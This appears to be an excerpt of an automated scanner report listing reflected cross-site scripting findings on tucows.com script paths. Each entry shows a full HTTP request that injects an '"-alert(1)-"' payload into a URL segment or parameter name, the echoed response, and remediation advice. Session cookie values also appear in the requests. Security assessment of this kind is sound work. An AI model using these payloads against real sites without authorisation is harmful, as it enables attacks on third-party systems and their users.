HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:31 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:41 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/signupin.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/includes/js/x_core.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
